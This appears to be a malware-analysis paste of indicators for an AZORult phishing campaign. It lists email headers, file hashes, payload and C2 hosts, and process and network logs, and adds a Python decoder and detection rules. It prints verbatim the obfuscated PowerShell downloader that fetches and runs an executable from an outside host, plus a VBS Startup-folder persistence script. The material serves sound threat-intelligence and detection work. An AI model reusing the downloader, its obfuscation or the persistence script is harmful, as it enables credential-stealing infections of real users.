VRad

#azorult_080419

Apr 8th, 2019
#IOC #OptiData #VR #AZORult #LNK #MSHTA #PowerShell

https://pastebin.com/0bX17LaY

previous_contact:
--------------
17/09/18 https://pastebin.com/MwwZ7DyY

FAQ:
https://www.bleepingcomputer.com/news/security/azorult-trojan-steals-passwords-while-hiding-as-google-update/

attack_vector
--------------
email attach .ZIP > .LNK > GET .HTA > PowerShell > GET .GIF(EXE) > %Public%\???.exe > %AppData%\0mbii\gsir.exe

email_headers
--------------
Received: from jyotiimpex.co.in ([157.230.191.189])
by srv8.victim0.com for <user00@org88.victim0.com>; (envelope-from admin@jyotiimpex.co.in)
Reply-To: yakupabaci@ulasvana.com
From: Biju Kurian <admin@jyotiimpex.co.in>
To: user00@org88.victim0.com
Subject: Attached proposal #506697
Date: 08 Apr 2019 10:45:51 -0700

files
--------------
SHA-256 71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455
File name 506697.gif.zip [Zip archive data, at least v2.0 to extract]
File size 624 B (624 bytes)

SHA-256 67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80
File name 506697.gif.lnk [MS Windows shortcut, window=hidenormalshowminimized]
File size 1.65 KB (1686 bytes)

SHA-256 f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1
File name out-761452637.hta [HTML document, ASCII text, with very long lines]
File size 4.28 KB (4387 bytes)

SHA-256 3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b
File name 506697.gif [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 674 KB (690176 bytes)

activity
**************

PL_SRC:

gingerandcoblog{.} com/test/wp/out-761452637.hta [1st, initiate]

gingerandcoblog{.} com/test/wp/506697.gif [2nd, main file]

C2:

cubaworts{.} gq//700/index.php

Powershell
"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$bnFZCsAPHdW = Get-Random -Min 3 -Max 4;$AwQvehGyXOx = ([char[]]([char]97..[char]122));$uMoLAqAH = -join ($AwQvehGyXOx | Get-Random -Count $bnFZCsAPHdW | % {[Char]$_});$QBkXeDKCYCLy = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$fhMedM = $uMoLAqAH + $QBkXeDKCYCLy;$dlOPRLx=[char]0x53+[char]0x61+[char]0x4c;$XcjKCQxFekfTxHL=[char]0x49+[char]0x45+[char]0x58;$ZMIxPpGnUUPPRWE=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jigvt $dlOPRLx;$VBStX=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jigvt xambduhok $XcjKCQxFekfTxHL;$ITLGukyfdgq=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|xambduhok;jigvt igrvdkq $ZMIxPpGnUUPPRWE;$hJoIuIdIUjzbq = $ITLGukyfdgq + [char]0x5c + $fhMedM;;;;$chNKlgFcqw = 'aHR0cDovL2dpbmdlcmFuZGNvYmxvZy5jb20vdGVzdC93cC81MDY2OTcuZ2lm';$chNKlgFcqw=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($chNKlgFcqw));$QWTFrOflwfozpH = New-Object $VBStX;$JteOSk = $QWTFrOflwfozpH.DownloadData($chNKlgFcqw);[IO.File]::WriteAllBytes($hJoIuIdIUjzbq, $JteOSk);igrvdkq $hJoIuIdIUjzbq;;$NtkaFAJOmWuKn = @($wuHDKfhU, $sjRJmloYxc, $cfkBskr, $FugqnvRQKP);foreach($lvAJQrBp in $NtkaFAJOmWuKn){$null = $_}""
"
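The captured command line above hides its intent behind three tricks: strings assembled from [char]0xNN pieces, a Set-Alias chain (sAL creates jigvt, which then creates xambduhok for IEX and igrvdkq for sApS / Start-Process), and a base64-wrapped URL. The Python decoder below is an added example, not part of the original paste: it evaluates those constructs statically from a verbatim copy of the command line, so the download URL, the %PUBLIC% drop path and the launch step come out without executing anything. The regexes, the `<N random a-z>` placeholder and the alias table (only the three built-in aliases this sample uses) are the decoder's own; the one PowerShell fact it relies on is that Get-Random's -Maximum is exclusive, so `-Min 3 -Max 4` always yields a 3-letter name, matching qkn.exe in the proc section.

```python
import base64
import re

# The captured command line from the 'Powershell' section above, embedded verbatim
# so the decoder runs offline. Nothing in it is executed.
CAPTURED = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$bnFZCsAPHdW = Get-Random -Min 3 -Max 4;$AwQvehGyXOx = ([char[]]([char]97..[char]122));$uMoLAqAH = -join ($AwQvehGyXOx | Get-Random -Count $bnFZCsAPHdW | % {[Char]$_});$QBkXeDKCYCLy = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$fhMedM = $uMoLAqAH + $QBkXeDKCYCLy;$dlOPRLx=[char]0x53+[char]0x61+[char]0x4c;$XcjKCQxFekfTxHL=[char]0x49+[char]0x45+[char]0x58;$ZMIxPpGnUUPPRWE=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jigvt $dlOPRLx;$VBStX=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jigvt xambduhok $XcjKCQxFekfTxHL;$ITLGukyfdgq=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|xambduhok;jigvt igrvdkq $ZMIxPpGnUUPPRWE;$hJoIuIdIUjzbq = $ITLGukyfdgq + [char]0x5c + $fhMedM;;;;$chNKlgFcqw = 'aHR0cDovL2dpbmdlcmFuZGNvYmxvZy5jb20vdGVzdC93cC81MDY2OTcuZ2lm';$chNKlgFcqw=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($chNKlgFcqw));$QWTFrOflwfozpH = New-Object $VBStX;$JteOSk = $QWTFrOflwfozpH.DownloadData($chNKlgFcqw);[IO.File]::WriteAllBytes($hJoIuIdIUjzbq, $JteOSk);igrvdkq $hJoIuIdIUjzbq;;$NtkaFAJOmWuKn = @($wuHDKfhU, $sjRJmloYxc, $cfkBskr, $FugqnvRQKP);foreach($lvAJQrBp in $NtkaFAJOmWuKn){$null = $_}""'''

# Built-in PowerShell aliases the sample resolves through its Set-Alias chain.
BUILTIN_ALIASES = {"sal": "Set-Alias", "iex": "Invoke-Expression", "saps": "Start-Process"}
CHAR_TOKEN = r"\[char\]0x[0-9a-fA-F]{2}"


def resolve(name, script, depth=0):
    """Statically evaluate $name from its first assignment in script.

    Handles $var references, [char]0xNN pieces, a quoted literal and the
    Get-Random name-length dance. Get-Random's -Maximum is exclusive, so
    '-Min 3 -Max 4' always yields 3 (hence the 3-letter qkn.exe above).
    Anything else becomes a <name> placeholder rather than a guess.
    """
    if depth > 6:
        return f"<{name}>"
    m = re.search(r"\$" + re.escape(name) + r"(?!\w)\s*=\s*([^;]*)", script)
    if not m:
        return f"<{name}>"
    expr = m.group(1).strip()
    lit = re.fullmatch(r"'([^']*)'", expr)
    if lit:
        return lit.group(1)
    rnd = re.search(r"Get-Random -Min (\d+) -Max (\d+)", expr)
    if rnd:
        lo, hi = int(rnd.group(1)), int(rnd.group(2)) - 1
        return str(lo) if lo == hi else f"{lo}..{hi}"
    cnt = re.search(r"Get-Random -Count \$(\w+)", expr)
    if cnt:  # -join of N characters drawn from [a-z]
        return f"<{resolve(cnt.group(1), script, depth + 1)} random a-z>"
    parts = []
    for tok in re.findall(r"\$\w+|" + CHAR_TOKEN, expr):
        if tok.startswith("$"):
            parts.append(resolve(tok[1:], script, depth + 1))
        else:
            parts.append(chr(int(tok[-2:], 16)))
    return "".join(parts) or f"<{name}>"


def decode(script):
    """Recover aliases, downloader class, URL, drop path and launch step from the obfuscated line."""
    aliases, set_alias_cmds, launches = {}, {"sal", "set-alias"}, []
    for st in (s.strip() for s in script.split(";")):
        # 'sAL jigvt $dlOPRLx' style: <Set-Alias or an alias of it> <newname> $<var holding target>
        m = re.fullmatch(r"(\w+)\s+(\w+)\s+\$(\w+)", st)
        if m and m.group(1).lower() in set_alias_cmds:
            target = resolve(m.group(3), script)
            canonical = BUILTIN_ALIASES.get(target.lower(), target)
            aliases[m.group(2)] = canonical
            if canonical == "Set-Alias":  # an alias of Set-Alias can itself create aliases
                set_alias_cmds.add(m.group(2).lower())
            continue
        # '<alias> $<var>' invocation, e.g. the renamed Start-Process on the dropped file
        m = re.fullmatch(r"(\w+)\s+\$(\w+)", st)
        if m and m.group(1) in aliases:
            launches.append((aliases[m.group(1)], resolve(m.group(2), script)))

    def via(pattern):
        m = re.search(pattern, script)
        return resolve(m.group(1), script) if m else None

    b64 = via(r"FromBase64String\(\$(\w+)\)")
    return {
        "aliases": aliases,
        "downloader": via(r"New-Object \$(\w+)"),
        "url": base64.b64decode(b64).decode() if b64 else None,
        "drop_path": via(r"WriteAllBytes\(\$(\w+),"),
        "launch": launches,
    }


if __name__ == "__main__":
    for key, value in decode(CAPTURED).items():
        print(f"{key}: {value}")
```

Running it prints the resolved pieces: the three aliases, Net.WebClient as the downloader, the 2nd-stage URL from PL_SRC, and the drop path `$env:PUBLIC\<3 random a-z>.exe` handed to Start-Process. `$env:PUBLIC` is left as the string the script builds; the sample pipes it through IEX at run time to get C:\Users\Public.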

netwrk
--------------
67.225.197.20 gingerandcoblog{.} com GET /test/wp/out-761452637.hta HTTP/1.1 Mozilla/4.0
67.225.197.20 gingerandcoblog{.} com GET /test/wp/506697.gif HTTP/1.1 No User Agent [!..This program must be run under Win32]
51.89.0.140 cubaworts{.} gq POST /700/index.php HTTP/1.1 Mozilla/4.0

comp
--------------
mshta.exe 3428 TCP localhost 50097 67.225.197.20 80 SYN_SENT
mshta.exe 3428 TCP localhost 50098 67.225.197.20 80 ESTABLISHED
powershell.exe 3244 TCP localhost 50099 67.225.197.20 80 ESTABLISHED
[System] 0 TCP localhost 50100 51.89.0.140 80 TIME_WAIT

proc
--------------
"C:\Windows\system32\mshta.exe" h11p:\ gingerandcoblog{.} com/test/wp/out-761452637.hta
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null ...

C:\Users\Public\qkn.exe
C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
C:\Users\operator\AppData\Roaming\0mbii\gsir.exe

"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "gsir.exe"
C:\Windows\system32\timeout.exe 3

persist
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 29.03.2019 11:03
0mbii.vbs
c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\0mbii.vbs 29.03.2019 11:03

0mbii.vbs
- - - - -
"
SEt wdd = CreateObjEcT("wScRipt.shelL")
WdD.Run """C:\Users\operator\AppData\Roaming\0mbii\gsir.exe"""
"

drop
--------------
C:\Users\Public\qkn.exe
C:\Users\operator\AppData\Roaming\0mbii\gsir.exe [removed]
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0mbii.vbs
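As an added example (not part of the original paste), the checks below turn the proc, persist and drop sections into detection logic: mshta.exe handed an http URL, PowerShell with -ExecutionPolicy bypass whose parent is a script host, binaries executing from C:\Users\Public or %AppData%\Roaming, the `cmd /c timeout N & del` self-delete, and a .vbs in the Startup folder that runs a binary from the user profile. The event records are constructed to mirror the proc section: PIDs 3428 and 3244 come from the comp section, while the other PIDs, the parent links, the refanged mshta URL and the notepad.exe control event are assumed. Rule names are the example's own.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events mirroring the 'proc' section above.
# PIDs 3428/3244 are from the 'comp' section; the rest are assumed for the example.
EVENTS = [
    ProcEvent(3428, 1200, r"C:\Windows\system32\mshta.exe",
              r'"C:\Windows\system32\mshta.exe" http://gingerandcoblog.com/test/wp/out-761452637.hta'),
    ProcEvent(3244, 3428, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null ...'),
    ProcEvent(3300, 3244, r"C:\Users\Public\qkn.exe", r"C:\Users\Public\qkn.exe"),
    ProcEvent(3320, 3300, r"C:\Users\operator\AppData\Roaming\0mbii\gsir.exe",
              r"C:\Users\operator\AppData\Roaming\0mbii\gsir.exe"),
    ProcEvent(3340, 3320, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "gsir.exe"'),
    ProcEvent(4000, 900, r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe" notes.txt'),  # benign control event
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Lower-case, backslash-delimited directory fragments an unprivileged user can write to.
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\roaming\\", "\\appdata\\local\\temp\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return {pid: [rule, ...]} for every event that trips at least one rule."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        rules = []
        name, cmd, image = basename(e.image), e.cmdline.lower(), e.image.lower()
        parent = by_pid.get(e.ppid)
        # mshta fetching an HTA over HTTP (1st stage above)
        if name == "mshta.exe" and re.search(r"https?://", cmd):
            rules.append("mshta_remote_hta")
        # PowerShell told to ignore execution policy; worse when a script host is the parent
        if name == "powershell.exe" and re.search(r"-(executionpolicy|ep)\s+bypass", cmd):
            if parent and basename(parent.image) in SCRIPT_HOSTS:
                rules.append("script_host_spawned_powershell_bypass")
            else:
                rules.append("powershell_bypass")
        # %Public%\???.exe and %AppData%\0mbii\gsir.exe both run from user-writable paths
        if any(frag in image for frag in USER_WRITABLE):
            rules.append("exec_from_user_writable_dir")
        # "timeout 3 & del" after the payload has copied itself elsewhere
        if name == "cmd.exe" and re.search(r"timeout(\.exe)?\s+\d+\s*&\s*del\b", cmd):
            rules.append("timeout_then_del_self_delete")
        if rules:
            hits[e.pid] = rules
    return hits


STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
# Constructed copy of 0mbii.vbs from the 'persist' section (the original mixes case on purpose).
STARTUP_PATH = r"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0mbii.vbs"
STARTUP_VBS = ('SEt wdd = CreateObjEcT("wScRipt.shelL")\r\n'
               'WdD.Run """C:\\Users\\operator\\AppData\\Roaming\\0mbii\\gsir.exe"""\r\n')


def suspicious_startup_script(path, content):
    """True for a Startup-folder script that uses WScript.Shell.Run on a binary under a user profile."""
    p = path.lower()
    if STARTUP_DIR not in p or not p.endswith((".vbs", ".vbe", ".js", ".jse", ".wsf")):
        return False
    c = content.lower()  # case-insensitive, because VBScript is and the sample relies on it
    uses_shell_run = "wscript.shell" in c and ".run" in c
    target_in_profile = re.search(r"[a-z]:\\users\\[^\"\r\n]*\\appdata\\", c) is not None
    return uses_shell_run and target_in_profile


if __name__ == "__main__":
    for pid, rules in detect(EVENTS).items():
        print(pid, rules)
    print("startup script suspicious:", suspicious_startup_script(STARTUP_PATH, STARTUP_VBS))
```

The parent check matters more than the bypass flag on its own: administrators launch PowerShell with -ExecutionPolicy bypass routinely, but mshta.exe or wscript.exe as the parent, as in the comp section here, is rarely legitimate. Paths are compared lower-cased because the persist section shows the same Startup folder recorded in two different casings.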

# # #
https://www.virustotal.com/gui/file/71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455/details
https://www.virustotal.com/gui/file/67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80/details
https://www.virustotal.com/gui/file/f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1/details
https://www.virustotal.com/gui/file/3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b/details
https://analyze.intezer.com/#/analyses/67953fad-ecb2-46b4-90d0-251e72079f8d

VR